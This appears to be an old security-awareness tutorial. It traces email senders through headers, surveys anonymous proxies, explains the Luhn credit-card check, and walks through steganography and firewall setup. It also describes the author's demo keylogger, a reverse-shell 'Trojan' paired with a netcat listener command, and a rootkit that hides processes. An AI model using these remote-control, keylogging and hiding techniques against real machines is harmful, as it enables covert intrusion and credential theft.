Reading E-Mail headers
Surfing Anonymously
Multiple domain names, one IP address
Remote keystroke logging
Trojans and how they work
Credit Card Checks
Using our own proxy server
Hiding behind pictures
Rootkits – A hackers best friend
Firewalls your best friend
Metasploit
Password Recovering
Bluetooth for remote locking
If you want to talk to someone on a phone anywhere in the
world, both of you require a phone number. There is an international body that
makes sure that your phone number is unique. There are no two phones in the
world that have the same phone number. Your phone instrument does not store the
phone number, the telephone exchange does.
The internet behaves in just the same way. If my computer
needs to be on the net, it needs not a phone number but an IP address. The full
form of IP is Internet Protocol but most people refer to it by the short form
only. Thus we first need to use a telephone instrument or a network card to
connect to a ISP or Internet Service Provider who will give us( our computer )
a IP address. The ISP in turn coordinates with a international body called ??
which makes sure that worldwide IP addresses are different.
We will connect to the internet using VSNL through a land
line phone and also using a reliance card and a portable computer using
wireless technologies. The reason we show you how to connect to the internet
using two methods is to show you that there is no difference between wire line
and wireless. The principles remain the same.
We click on the telephone icon and on the dialog box we
click on dial after keying in our user name and password. The password is
always displayed as stars. After some 30 seconds the modem noise stops and we
get connected to the net. The first thing that we need to know is the IP address
our machine has obtained from our ISP. We click on the two monitor icon on our
task bar with the right mouse button. We then choose the option Status and then
at the dialog box we use the tab details. The last option tells us our IP
address 219.65.18.178. Each time we reconnect to the internet this IP address
will change.
An IP address can have a value ranging from 0 to 4 billion.
It is very difficult to remember such large numbers and thus we represent an IP
address as four numbers from 0 to 255 separated by dots. This is why we call it
the dotted decimal notation. We multiply the first number by 1, the second by
256, the third by 65536 and the last by 2 raised to 24. This is how we can get
to the actual IP address. World over we represent IP address not by a single
number but by its dotted decimal notation. Each time we connect again to the
net, our ISP will give us a different IP address. Try it out for yourself.
We now start Outlook express which is a free program that
comes with windows that allows us to read E-Mail. We want to send ourselves an
e-mail so we click on the button Create e-mail and then at the new message
dialog we write our e-mail address at the To test box which is vmukhi@vsnl.com, i.e. we are sending a e-mail
to ourselves. At the subject dialog box we write From vsnl and then click on
the button send. This sends out the e-mail and if we wait for a few seconds and
then click on button send/receive we will receive the e-mail we have just send.
At the e-mail we will click on the right mouse button as
always, choose the last option properties and then the tab details. We then
click on the button message source to see the headers of the e-mail in a bigger
window. This is what we see.
Return-path: <vmukhi@vsnl.com>
Received: from smtp3.vsnl.net (smtp3.vsnl.net
[172.16.28.233])
by pop1.vsnl.net
(vsnl mail server)
with ESMTP id
<0INR001MXPHMDE@pop1.vsnl.net> for vmukhi@vsnl.com; Mon,
03 Oct 2005 10:21:22
+0530 (IST)
Received: from vmci (localhost [127.0.0.1])
by smtp3.vsnl.net
(vsnl mail server) with ESMTPA id
<0INR008BLPHKTP@smtp3.vsnl.net> for vmukhi@vsnl.com (ORCPT
vmukhi@vsnl.com)
; Mon, 03 Oct 2005
10:21:22 +0530 (IST)
Received: from ([219.65.18.178])
by smtp3.vsnl.net (InterScan E-Mail VirusWall Unix);
Mon,
03 Oct 2005 10:21:22
+0530 (IST)
Content-return: prohibited
Date: Mon, 03 Oct 2005 10:20:55 +0530
From: Vijay Mukhi <vmukhi@vsnl.com>
Subject: From vsnl
Sender: vmukhi@vsnl.com
To: vmukhi@vsnl.com
Message-id: <000a01c5c7d6$0b098830$b21241db@vmci>
MIME-version: 1.0
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
Content-type: multipart/alternative;
boundary="----=_NextPart_000_0007_01C5C804.23DA7170"
X-Priority: 3
X-MSMail-priority: Normal
Original-recipient: rfc822;vmukhi@vsnl.com
This is a multi-part message in MIME format.
The first time anyone looks at this output will wonder
whether anyone can understand this gibberish. The above headers have been
written by a computer and hence a layman will find it difficult to read. Our
e-mail may pass though lots of e-mail servers along the way. Each e-mail server
places its IP address in the headers. This is ho we can find out which e-mail
servers our e-mail has passed. Each entity on the net has an IP address and
thus we also see the IP addresses of all these entities.
There are a large number of lines that start with ‘Received:
from’. Each entity that receives the e-mail adds one such line or header. The
last such Received: from will represent us the sender of the e-mail. The order
is reversed in the manner we would think in conventional terms. After the word
from we see our computers IP address in square brackets [219.65.18.178] and
this is how we get at the IP address of the computer not person who send the
e-mail. There is no way of knowing who or what physical person send this
e-mail, all that we know is the IP address of the computer who send this mail.
We also get the date and time the e-mail is send. In our case, the date is 3rd
October 2005 at 10 21 in the morning. This is the time we are writing this
tutorial. Also the time says 5 30 IST as we are five and half hours away from
GMT or Greenwich Mean Time. As our server vsnl is in India the time is IST.
When we send e-mail from servers out of India the time will be their local time
and not ours. As the IP address is given by an Indian ISP we have to learn how
to convert from different time zones.
The next question is how do we figure out which ISP owns
this IP address. We know it is vsnl in our case but given a IP address how do
we figure out the owner. It is this owner who given date and time will tell us
which user he allocated this IP address to. All ISP maintain this log as they
need it for billing purposes. Thus internally an ISP will keep a log of every
IP address and at what time it was given to a certain user and for how long.
We go to site www.apnic.net
which is the master site for IP allocations for our part of the world. In the
text box Who is search we write the above IP address 219.65.18.178 and click on
go. We see a page with the below data.
inetnum: 219.64.0.0 - 219.65.255.255
netname: VSNL-INdescr: Videsh Sanchar Nigam Ltd - India.descr: Videsh Sanchar Bhawan, M.G. Roaddescr: Fort, Bombay 400001country: IN
This tells us that VSNL in India owns the above IP address.
It also gives us names and phones numbers of people we can contact. This is how
we trace the persons computer who send us the e-mail.
Lets take it a step further and send ourselves a e-mail from
yahoo. We navigate to the site http://in.yahoo.com/
and click on the icon mail. We key in our yahoo e-mail id vijaymukhi712 and
password and click on the button Sign In. We then click on button Compose to
create a e-mail. At the text box to we write our e-mail address vmukhi@vsnl.com and subject from yahoo. We
click on send to send the e-mail. After some time we receive the e-mail in
outlook express after clicking on send/receive. We once again choose the
e-mail, click on right mouse button. Properties, Details, Message Source to see
the following.
Return-path: <vijaymukhi712@yahoo.co.in>
Received: from mta3 ([172.16.28.188]) by pop1.vsnl.net (vsnl
mail server)
with ESMTP id
<0INR001YGQJ5DE@pop1.vsnl.net> for vmukhi@vsnl.com; Mon,
03 Oct 2005 10:43:55
+0530 (IST)
Received: from
web8610.mail.in.yahoo.com(web8610.mail.in.yahoo.com [202.43.219.85])
by mta3.vsnl.net
(vsnl mail server) with SMTP id<0INR00AGYQJ04W@mta3.vsnl.net>
for vmukhi@vsnl.com;
Mon, 03 Oct 2005 10:43:53 +0530 (IST)
Received: (qmail 75175 invoked by uid 60001); Mon, 03 Oct
2005 05:13:48 +0000
Received: from [219.65.18.178] by web8610.mail.in.yahoo.com
via HTTP; Mon,
03 Oct 2005 06:13:48
+0100 (BST)
Date: Mon, 03 Oct 2005 06:13:48 +0100 (BST)
From: vijay mukhi <vijaymukhi712@yahoo.co.in>
Subject: from yahoo
To: vmukhi@vsnl.com
The last received from shows us very clearly that this
e-mail was send by our IP address 219.65.18.178 on the 3rd October
at 06:13:48 hrs. BST is British Summer Time and is 4 hrs thirty minutes behind
us. This is why it is 6 in the morning in London. To convert it to IST we have
to add 4 hrs 30 minutes to it. This will give us a time of 10 43, the time we
send the e-mail from yahoo.
Lets now do the reverse. Lets send an email form outlook
express to our yahoo account. We click on create in outlook express and in the
to text box we write our e-mail address vijaymukhi712@yahoo.co.in. In the subject we write vijay1 and then
click on button send. In yahoo we click on the button Check Mail and now we
have to wait for some(lots of time) time before yahoo receives our e-mail.
|
X-Apparently-To: |
vijaymukhi712@yahoo.co.in via 202.43.219.84;
Mon, 03 Oct 2005 11:12:16 +0530 |
|
X-Originating-IP: |
[203.200.235.233] |
|
Return-Path: |
<vmukhi@vsnl.com> |
|
Authentication-Results: |
mta116.mail.in.yahoo.com from=vsnl.com;
domainkeys=neutral (no sig) |
|
Received: |
from 203.200.235.233 (EHLO smtp3.vsnl.net)
(203.200.235.233) by mta116.mail.in.yahoo.com with SMTP; Mon, 03 Oct 2005
11:12:16 +0530 |
|
Received: |
from vmci (localhost [127.0.0.1]) by
smtp3.vsnl.net (vsnl mail server) with ESMTPA id
<0INR006RZQZIZQ@smtp3.vsnl.net> for vijaymukhi712@yahoo.co.in; Mon, 03
Oct 2005 10:53:44 +0530 (IST) |
|
Received: |
from ([219.65.18.178]) by smtp3.vsnl.net
(InterScan E-Mail VirusWall Unix); Mon, 03 Oct 2005 10:53:44 +0530 (IST) |
|
Date: |
Mon, 03 Oct 2005 10:53:18 +0530 |
The last received from tells us that we received an e-mail
from 219.65.18.178
at 10 53 in the morning. The headers must be set on fro us to see them. By
default they are off. To turn them on we click on Options, General preferences
and then messages, show all headers. Not all sites allow e-mail headers to be
displayed.
We next go the site www.hotmail.com.
We first write our e-mail address vijaymukhi712@hotmail.com
and password and then click on Sign In. We then click on new message to send
out an e-mail. In the to box we write vmukhi@vsnl.com
and Subject from hotmail and click on send. We immediately get the e-mail in
outlook express and click on the e-mail, right mouse button, properties,
Details, message source and this is what we see.
Return-path: <vijaymukhi712@hotmail.com>
Received: from mta3 ([172.16.28.188]) by pop1.vsnl.net (vsnl
mail server)
with ESMTP id
<0INR003QUR7O2C@pop1.vsnl.net> for vmukhi@vsnl.com; Mon,
03 Oct 2005 10:58:41
+0530 (IST)
Received: from hotmail.com (bay12-f16.bay12.hotmail.com
[64.4.35.16])
by mta3.vsnl.net (vsnl mail server)with
ESMTP id <0INR00D2MR7P4V@mta3.vsnl.net>
for vmukhi@vsnl.com;
Mon, 03 Oct 2005 10:58:38 +0530 (IST)
Received: from mail pickup service by hotmail.com with
Microsoft SMTPSVC; Sun,
02 Oct 2005 22:28:36
-0700
Received: from 63.236.40.157 by by12fd.bay12.hotmail.msn.com
with HTTP; Mon,
03 Oct 2005 05:28:36
+0000 (GMT)
Date: Mon, 03 Oct 2005 05:28:36 +0000
From: Vijay mukhi <vijaymukhi712@hotmail.com>
Subject: From hotmail
X-Originating-IP: [219.65.18.178]
X-Sender: vijaymukhi712@hotmail.com
To: vmukhi@vsnl.com
Here at the received from we do not see our IP address but
there is a header called
X-Originating-IP that carries the IP address 219.65.18.178. The time is
given in GMT as 5:28 as the +0000 signifies it as GMT. We add 5 and half hrs to
come at a time of 11 o’clock the time we send the e-mail. This is how we can
track e-mail send from a web based e-mail provider.
When we send the e-mail from vsnl to hotmail, these are the
headers
MIME-Version: 1.0
Received: from smtp3.vsnl.net ([203.200.235.233]) by mc3-f34.hotmail.com with
Microsoft SMTPSVC(6.0.3790.211); Sun, 2 Oct 2005 22:29:52 -0700
Received: from vmci (localhost [127.0.0.1]) by smtp3.vsnl.net (vsnl mail
server) with ESMTPA id <0INR0084TR8XTP@smtp3.vsnl.net> for
vijaymukhi712@hotmail.com; Mon, 03 Oct 2005 10:59:23 +0530 (IST)
Received: from ([219.65.18.178]) by smtp3.vsnl.net (InterScan E-Mail VirusWall
Unix); Mon, 03 Oct 2005 10:59:23 +0530 (IST)
Sender: vmukhi@vsnl.com
X-Message-Info: JGTYoYF78jGvQKHDMF06vXk+0nDlQ6k+ucYOO0FXePE=
X-MIMEOLE: Produced By Microsoft MimeOLE V6.00.2800.1441
X-Mailer: Microsoft Outlook Express 6.00.2800.1437
X-MSMail-priority: Normal
Return-Path: vmukhi@vsnl.com
X-OriginalArrivalTime: 03 Oct 2005 05:29:53.0445 (UTC)
FILETIME=[7B8BC550:01C5C7DB]
The received from shows us the IP address and
the time is IST as we are sending it form a server in India. To see e-mail
headers, choose options, on the left choose mail, mail display settings, and
then the radio button advanced in message headers.
We then move to www.yahoo.com
and click on the icon mail. We log in as svmukhi and then click on the button
compose. We write the same e-mail address vmukhi@vsnl.com
and subject from yahoo. We then click on right mouse button, properties,
details, message source to see
Return-path: <svmukhi@yahoo.com>
Received: from mta3 ([172.16.28.188]) by pop1.vsnl.net (vsnl
mail server)
with ESMTP id
<0INR003TBSHA2C@pop1.vsnl.net> for vmukhi@vsnl.com; Mon,
03 Oct 2005 11:26:00
+0530 (IST)
Received: from
web50408.mail.yahoo.com(web50408.mail.yahoo.com [206.190.38.73])
by mta3.vsnl.net
(vsnl mail server)with SMTP id <0INR00CXPSH8IO@mta3.vsnl.net>
for vmukhi@vsnl.com;
Mon, 03 Oct 2005 11:25:58 +0530 (IST)
Received: (qmail 98590 invoked by uid 60001); Mon, 03 Oct
2005 05:55:56 +0000
Received: from [219.65.18.178] by web50408.mail.yahoo.com
via HTTP; Sun,
02 Oct 2005 22:55:56
-0700 (PDT)
Date: Sun, 02 Oct 2005 22:55:56 -0700 (PDT)
From: Sonal Mukhi <svmukhi@yahoo.com>
Subject: from yahoo
We once see our IP address at the last 219.65.18.178
received from but the date and time is 2nd October 22:55. The time stamp is PDT
or pacific time which is 7 hrs behind GMT. Thus we need to add 7 hrs to 22:55
which gives us 05:55 GMT 3rd October. We then add 5:30 hrs to
convert to our time which gives us 10 25 IST.
This is how we convert PDT to IST. Basically add 12 and half hrs to it
and may have to add one more day to the date.
We next log into the web mail part of vsnl using the url http://webmail.vsnl.com. We log in as
vmukhi and choose the server vsnl.com and write our password. We then click on
the option Compose and send ourselves a e-mail at vmukhi@vsnl.com. We as always click on send
and see the following headers
Return-path: <vmukhi@vsnl.com>
Received: from vsnl.net (pop1.vsnl.net [172.16.28.144])
by pop1.vsnl.net
(vsnl mail server)
with ESMTP id
<0INR0032DSWP2C@pop1.vsnl.net> for vmukhi@vsnl.com; Mon,
03 Oct 2005 11:35:13
+0530 (IST)
Received: from [172.16.28.181] by pop1.vsnl.net (mshttpd);
Mon,
03 Oct 2005 11:05:13
+0500
Date: Mon, 03 Oct 2005 11:05:13 +0500
From: vmukhi@vsnl.com
Subject: Hi
To: vmukhi@vsnl.com
Message-id: <7d9a27ab00.7ab007d9a2@vsnl.net>
MIME-version: 1.0
The last received from carries a different IP address
172.16.28.181 and the time is 5 and 5 half hrs ahead. The time we send the
e-mail is 11 35 and not 11 05. We have to add half a hour. Apnic tells us that
the above IP address is not allocated to it at all. For the Africian region we
need to go to site http://www.afrinic.net/,
North America is http://www.arin.net/, Latin
America is http://lacnic.net/en/index.html
and Europe is http://www.ripe.net/.
We go to a site like www.samspade.org and in the box IP
WhoIS we specify our IP address. What we told is that the above IP address is
reserved. Thus there is no way of finding out who send the e-mail.
We then went to the site http://mailer.us.tf/
and send a e-mail to vmukhi@vsnl.com from
this page. The e-mail headers were as follows.
Return-path: <tprf011@diffusion.agava.com>
Received: from mta3 ([172.16.28.188]) by pop1.vsnl.net (vsnl
mail server)
with ESMTP id
<0INR004X3V51W1@pop1.vsnl.net> for vmukhi@vsnl.com; Mon,
03 Oct 2005 12:23:28
+0530 (IST)
Received: from eternity.agava.net (eternity.agava.net
[198.173.4.2])
by mta3.vsnl.net (vsnl mail server)with
ESMTP id <0INR00CHOV4RP7@mta3.vsnl.net>
for vmukhi@vsnl.com;
Mon, 03 Oct 2005 12:23:26 +0530 (IST)
Received: from diffusion.agava.com (diffusion.agava.com
[198.173.4.9])
by eternity.agava.net (Postfix) with ESMTP
id 7C1641535A for<vmukhi@vsnl.com>;
Mon, 03 Oct 2005
01:53:14 -0500 (CDT)
Received: by diffusion.agava.com (Postfix, from userid 3665)
id 7869DBC61B2; Mon,
03 Oct 2005 01:53:14 -0500 (CDT)
Date: Mon, 03 Oct 2005 12:22:13 +0000
From: "" <>
To: vijay <vmukhi@vsnl.com>
Message-id:
<20051003065314.7869DBC61B2@diffusion.agava.com>
The e-mail headers have a received from but instead of IP
address they have a user id. Once again there is no way of knowing who send
this e-mail. The e-mail server is 5 hrs behind GMT so the time of sending is 6
: 53 to which we add 5 30 hrs to give us about 12 27 the time on my watch. My
IP address is not send out. If this server refuses to give out the IP address
there is no way of finding out which server send the mail. There are a large
number of such anonymous e-mail servers in the world.
Surfing Anonymously.
When we go to the web site http://www.trafficzap.com/showip.php
or www.ipadressguide.com we are told of our IP address in the top
left hand corner. We now would want to hide our IP address from the world. We
then go the following site http://www.space.net.au/~thomas/quickbrowse.html
which gives us a predefined list of sites that offer anonymous browsing. We
write the url http://www.trafficzap.com/showip.php
in each of the boxes and we see a different ip address in apnic. The first text
box for anonymizer gives us a IP address of 168.143.113.59. The second guardster takes us to the guardster site
where we write the url again and click on the link surfing anonymously.. This
time we get a Ip address of 64.246.18.83.
The fourth proxy one gives us a url of 65.110.6.34.
This is how we can surf the net using some
other IP address.
By going though a proxy server,
there is no way of stopping people for visiting any site. Our government can
stop us from visiting a proxy by configuring its routers on Indian territory to
drop packets with a certain IP address. If we go through a proxy server, the IP
address on our packet is the proxy and from there where we go no one knows.
The point to be made is that no
one other than the proxy knows where you are headed to. This is why governments
have a problem in blocking sites. They can only stop you from visiting sites
that they know off. If they do not know what they are doing, they cannot stop
you from doing that.
There are a large number of proxy
servers like http://www.behidden.com/ on
the net that allow you to surf anonymously.
There is another way of being invisible on the net. We went to a site and downloaded the file invisiblebrowsing.exe after filling out a form at http://www.amplusnet.com/products/invisiblebrowsing/download.htm . We arrive at a dialog box and before we do anything we note our ip address. We then click on the down arrow of the list box and if empty we click on the refresh list.
After a wait of a few seconds we see a long list of proxy servers that we can use from all over the world. We choose any one of the proxies of our choice by double clicking on it and then on the dialog box we click on the button start testing. After waiting for a couple of seconds we get the green signal that the proxy is ready and we then click on done. This adds the proxy to our list of proxies which as of now is one.
We click on the check box enable invisible browsing and then browse to a site www.ipaddressguide.com. This site tells us what ip address it is using. However in the dialog box if we click on the button What is my Ip we are taken to a site http://www.amplusnet.com/services/whatismyip/whatismyip.asp that displays our ip address. We then go to another web site http://www.whatismyip.com/ which displays our IP address which is again different from what the other sites show us.
We finally go to a site http://www.whatismyipaddress.com/ which once again shows us another ip address. The last site takes some time in loading. This is how wherever we go we are given a new ip address. The good thing about invisible browsing is that we do not have to change the browser settings.
If we click on the button Online Privacy the program will delete all the cache and other entities that IE stores internally. These include cookies, history , temporary internet files, auto complete forms, passwords. It can also block java script and active x controls. Useful if you are using some one else’s computer. This program uses port 8080 to route the traffic and hence we must make sure that we have no other program using this port.
We can also choose as many proxies as we want and the program will change the proxy every 10 minutes. We then ran a ping on the site www.whatismyip.com. The ip address is 63.209.100.216. We then trapped the bytes using ethereal and never saw any packets going to this web site. There is lots of traffic flowing from different ip addresses and some we will try and explain the traffic.
At times it is better to click with the right mouse button in the main window and choose test all proxies as unless a proxy Is not tested the program will not use it. The check box Invisible browsing should be unchecked and we go to IE, Tools, Internet Options, Connections, Settings for LAN and at this dialog box we will see that the check box for proxy is off. We close the dialog box and then check the invisible browsing on in our program. When we click on the Lan settings button again we see the proxy setting on and also that the host server is 127.0.0.1 and port number 8080.
We move to another site http://www.multiproxy.org/downloads.htm and download the file mproxy12.zip at the bottom of the page. When we run the program we get a small dialog box. Like it or not at the beginning it tests all the proxies in its list for whether they are on or not. This can take about a minute at times. We then click on the tab Proxy List and then choose options. At the dialog box we choose the second tab Proxy server list.
We should see a list of at least 9 proxy servers and they start with a red or green dot. Red means they are down, green they are up. If you do not have at least one proxy server with a green dot we have problems. So we click on the button menu and then click on Add.
At the dialog box we write out the name of a working proxy server. The one we used is 193.63.75.19 and a port address 3127. The program tests whether the proxy is working and now puts a green or red dot. The only thing left is to enable proxy server in lan settings and change the port number to 8088 instead of 8080 and keep ip address to 127.0.0.1
Now when we surf we see some messages flashing in our main proxy window and each time we get a different ip address. Both the two products work in similar ways. The modem proxy settings have no real use and the values we place here are ignored.
Multiple domain names, one IP address
Ping is a tool available on all
operating systems that tells you whether a system is alive and kicking. Thus
ping www.vijaymukhi.com does two
things, it will tell us whether my server is up or not and also gives me its IP
address. In this case it is 70.85.134.18. We will now ping another site www.venusjewel.com. This gives us the same
Ip address 70.85.134.18. This means that both sites vijaymukhi.com and
venusjewel.com share the same IP address.
Thus if we block domain name
vijaymukhi.com using the IP address 70.85.134.18 then we are also blocking
venusjewel.com. This is why blocking domain names is not a feasible option.
Also the other site can sue. Thus blocking domain names is not a practical
option.
Remote keystroke logging We have written some code to demonstrate various techniques hackers use. One of them is installing a program called a keystroke logger that will log all keystrokes pressed on the keyboard and send it to another machine somewhere else in the world. We place all our code in the directory cybercode. Our remote portable has the IP address 220.224.5.20 and on this machine we run the program keylogerserver in a dos box. This program will wait for a client to connect to it. The client is called keyloggerclient which we run as Keyloggerclient 220.224.5.20 From now onwards whatever key we press on the client we see a copy of it on the server. We have a html file called keylogger.html that lets us key a password into a text box that shows us stars. On our server we see the actual text. Thus anything that our unsuspecting use keys in on the client, the server also gets a copy. There is a batch file keylogger.bat that creates the actual exe files. The two .c files show us how small the code is for these two programs keyloggerclient.c and keyloggerserver.c Trojans and how they work We have written a small demo program Trojan which demonstrates how a Trojan works. A popular program on the net is called nc or netcat which is the swiss army knife of networking. Every network administrator has a copy of this program. has a copy of this program. It is freely downloadable from the net. We run this program from the server or the target machine as Nc –l –p 4444 It does nothing and simply waits for us. On the client or suspects we run the Trojan as Trojan 220.224.51.58 The above is the IP address of our server. The minute we run the above program, we see a dos box on our server. When we do a dir, we are actually running the dir on the client remotely and not on the server. If we do a cd\, we move to the root of drive C on the client. When we run notepad, we run it on the client and not on the server. We know this because we see it in the task manager of the client and not the server. Thus we have notepad running on our machine but it does not show up. Only when we say exit on the server do we break the connection and we see the copies of notepad appear from nowhere. On the client there are no visible signs that a server is controlling us. This is how we run programs on the server but the actually run on the client. This is how we can remotely control a machine just by knowing its IP address. Credit Card Checks Every credit card number has a unique structure. The first digit tells us the name of the company that gave us the card, 4 means visa, 5 means master card. Each time we give our credit card number on the net, the following calculations are carried out to check the authenticity of the card. Below is my visa credit card number. 4 3 8 5 8 7 9 0 0 6 7 3 1 0 2 4 8 16 16 18 0 14 2 4 7 7 9 5 We leave the last digit aside and then multiply all the other digits by 2 or double them. If they have a value larger than 9, we either add the individual digits or subtract 9 from this answer. We then add up all these digits to get a number divisible by 10, 70 in our case. This calculation is called the Luhn algorithm after a German who invented it. Each time we give a credit number on the net, the following check is made. At times the date of validity is also checked. The actual balance is not always checked as it is a time consuming and expensive. When we download a program that generates a fake credit card for us, it generates a random number for us making sure that the above rule is adhered to. Giving a credit card on the net is safer than giving it to a waiter in a restaurant. We have a power point presentation in the file creditcard.ppt. Using our own proxy server.
The
Achilles proxy is available at the url http://i.b5z.net/i/u/1268303/f/tools/achilles_0_27.zip.
The base url is http://www.mavensecurity.com/achilles. We have two machines that have access to the
internet. One using reliance a portable and the other a actual computer using
VSNL. We would like to surf the net from the reliance connection but would like
the world to think we are surfing from a vsnl address. The reliance machine has
a IP address 220.224.51.50 and the vsnl machine 219.65.18.142.
We
unzipped the above zip file in the C:\Achilles directory on the vsnl machine on
which we want to run the proxy server and ran the program Achilles from this
directory. We changed no setting at all and simply clicked on the first button
on the toolbar that starts Achilles. By
default Achilles does not start when we run it.
We
then made some changes to the settings in IE on the portable or reliance
machine. We clicked on menu tools, internet options and then click on the tab
Connections and there we see a list of connections to the net that we can use.
Some of you may get one, some may get more than one. Choose the connection you
use and then click on the button settings.
The
second part of the dialog box speaks of proxy settings and we click on the
check box use Proxy server which is disabled. We then key in our proxy server
IP address 219.65.18.142 and the port number as 5000. This is the IP address of the machine running Achilles and in
this case the ip address will not be fixed. Proxy servers must have a fixed IP
address. The port number that Achilles uses is 5000 and this can be changed by
us at will. Always use a number larger than 5000. We then restart IE for sake
of abundant caution.
We
then run IE, move to the site www.apnic.net
and see the IP address of the proxy 219.65.18.142 and not the reliance IP
address. Even though we are surfing on the reliance machine, the modem lights
on both machines are on. We stop our
proxy server and then click on the fourth check box option log. We see a file
dialog box where we specify a file name and all traffic passing through our
proxy gets logged to the file. There are no IP addresses saved to the file thus
there is no way of getting back to the computer that requested the page.
We then move back to Achilles and there we check the first three check boxes under Intercept mode, Intercept mode on, intercept client data, intercept server data. We then click on the first picture on the tool box under the menu to start the proxy. From now on unless we click on the button send, the system will refuse to send the data from the client to the server. This way we can be in charge of allowing the packets to pass through.
The
Spike Proxy
We
downloaded the spike proxy from the url
http://www.immunitysec.com/downloads/SP148.zip.
We unzipped into C:\ as before and this created a directory C:\spikeProxy
on the vsnl computer. We ran the batch file that comes with the spike proxy
runme. Then depending upon whether we surf our net as a Dial up or network
connection we change the proxy settings of our port to 8080 and not 5000 as
used before. The port numbers used by proxy servers can be configured by us.
In this case we see all the network traffic zooming through in the dos box. We see only headers and no actual data. We also see the IP address of the computer using us as a proxy. All this data zips through our dos box. We see both the response and reply flowing through the proxy server. This program is over 14 MB large and comes with over 5000 files and the entire source code of how it works. Spike is also a vulnerability scanner.
Thus a proxy server is very easy to install and there are a large number available on the internet. These products offer us total anonymity on the net. For the law enforcement they see only my vsnl IP address, they do not know that some else is surfing the net. Any one on the other side of the proxy is invisible.
Hiding behind pictures
We have a two gif files
steg.gif and stego.gif that look the same. We have a html file steg.html that
displays the two gif files. We run the html file so that you can see that there
is no difference in appearance in the two files. We would now like to hide some
data within this gif file so no one can see that data. We first run the program
as
steghide steg.gif legal
This program steghide places
the words legal in the file steg.gif in such a way that if we scan the gif file
steg.gif we will not see the words legal in it at all. We then run another
program stegshow as
stegshow steg.gif
legal
This program stegshow
displays what we have hidden in the gif file. Anyone who now runs steg.html
will yet see steg.gif and stego.gif as similar in appearance. The steg.gif file
however has the words legal in it. What we have done is not place the words
legal at the end of the file, but hidden the bits that make up legal in the
color table of the gif file.
This is why the size of the
two files steg.gif and stego.gif are the same. The file steg.ppt goes into
details of how to hide data within pictures and no one will know. This is how
terrorists exchange information using pictures. We could also use video and
sound files as they are larger. You may go to a web site that simply shows some
pictures and sound recordings but could be people exchanging secret
information.
Rootkits – A hackers best
friend
We first move into a
sub-directory called C:\drivermm. Here we run the windows calculator calc.exe.
We then press the keys Ctrl. Alt and Del and at the dialog box choose task
manager. In task manager we click on image name to see the programs running
under windows sorted. We will see calc.exe running in this list.
We then say dir to confirm
that the file calc.exe is present in the directory drivermm. We then our
program y as follows.
Y –I calc.exe
We first say dir and realize
that calc.exe no longer shows up in the directory listing. We then also realize
that it disappears from the task manager listing. Thus we have now convinced
windows that even though calc.exe is on the disk, dir no longer sees it, also
even though it is running on our computer, task manger is oblivious of its
existence. Thus we are able to convince windows that calc.exe is not present on
our computers even though it is.
We then the same program as
Y –u
This uninstalls our device
driver and a dir shows calc.exe but task manager yet refuses to do so. A
program under windows can run under two different privileges, we call them ring
0 and ring 3. A program we run runs with fewer privileges and it is said to be
running in ring 3, whereas the OS itself runs in ring 0. Any program that talks
to hardware is called a device driver and these programs have to run in ring 0.
Programs that run in ring 3 are crippled, there are lots of things they cannot
do. The core of the Windows and Linux operating systems runs in ring 0.
Thus if I were a malicious
program like a virus, key stoke logger, if I run in ring 3, there are few
things I can do. If I run in ring 0, then no one can stop me from doing
anything on the machine. As a ring 0 program runs at the same level as windows,
no can prevent it from doing whatever it wants to.
Firewalls your best friend
We will be showing you how to work with four different firewall products so that you can understand what role they play in e-security. People believe that if you install firewalls you can sleep very well at night. How true or false is this statement we leave it to you to decide. As always we will have two machines connected to the net and one of them the portable with reliance connectivity has a web server running on it. We will install the three firewalls on the portable and then try and see what security it adds on to the portable.
The first firewall we do with you is from a company called zonelabs and the url to download it is http://www.zonelabs.com/store/content/company/products/trial_zaFamily/trial_zaFamily.jsp?lid=zassskulist2_trial and the file name is zaSuiteSetup_55_094_000.exe
When we install this program it asks us a zillion questions and then installs the entire zonelabs products including a anti virus product. These questions basically determine what features of zone labs will be activated like spam control, virus protection etc. After re booting the machine, zone labs automatically starts up to protect our system. We must click on click here to continue the trial. We had a small problem during installation. Someone without our permission installed Google Desktop search. Zone labs refused to install unless we first uninstalled this product from Google.
Each time some product tries to connect to the net, za informs us and asks for our permission. This way we know who all are accessing the net. In our case we get a dialog telling us that a file f.exe which we are not ware of is trying to connect to the net. We obviously denied it permission and went to delete this file from our computer. Thus at first it gets very bugging as we are told of dozens of programs that are trying to connect to the net. We have to thus teach za which products are harmful and which are harmless.
Each time a program wants to act as a server it needs permission from windows. The next set of permissions will be program that want to be servers. We once again have to allow or deny each server permission.
Vice Versa if any packet is trying to enter our system, a dialog box pops up. While we were writing this tutorial we get a alert saying that Ip address 67.150.117.21 ( UDP port 1028) was denied access. Thus someone advertently or otherwise send us this UDP packet which our firewall blocked.
Thus the first time we run outlook express a dialog box informs us that that outlook express is connecting to the net. This is how we know of all internet activity that takes place on our machine. Without a firewall there is no way of knowing what program are doing on the net. The point to be emphasized is that we are informed of activity both ways, coming to our machine and moving away from our machine.
When we right click on the za icon in our tray and then choose block all internet activity, we cannot connect to the net at all. The za icon becomes a lock. Double clicking on the za icon brings us to a screen where we choose firewall. Here we 3 zones, Internet for sites that we are not familiar with, trusted for those networks we know and blocked, those we do not like.
When we click on the tab zones we are allowed to add sites to these zones. We then click on the button add at the bottom of the screen , chose host/site and come to a dialog box. The zone field is a list box that has two options, trusted or blocked. We chose blocked and then give the domain name, www.google.co.in.
We then specify a name as the heading for display. We then click on Ok and then write the url www.google.co.in in ie and we get a error. Thus from now on we cannot access google India. This is how we can block our computer from visiting certain sites
The ip address of google.co.in is 66.102.7.99. When we write this ip address in ie we see the google page. So blocking just by domain name is not enough. The ip address option lets us specify a IP address instead of a domain name. Here we key in the above ip address and thus block both by name and ip. The point is that we have to block by name and address even though domain name gets converted to ip address. Just blocking by ip address is not enough.
We then chose the last tab expert where we specified the rules that our firewall will enforce. This is where the heart of a firewall kicks in. We clicked on add and came across a huge dialog box. We simply want to first disable http access. We wrote http as a label in the name field . The action field has a value allow which would have allowed us http access, we want to block http access so we change the value to block.
We then clicked on the modify of protocol and then add protocol and again once again add protocol. The protocol dialog box shows us a list of protocols, TCP, UDP etc. we chose the default TCP. For description we write web and then for destination port we choose http. The port number becomes 80 by default. The source port is other as the browser will keep changing the port number by 1 starting from 1024. We then click on ok and finally apply.
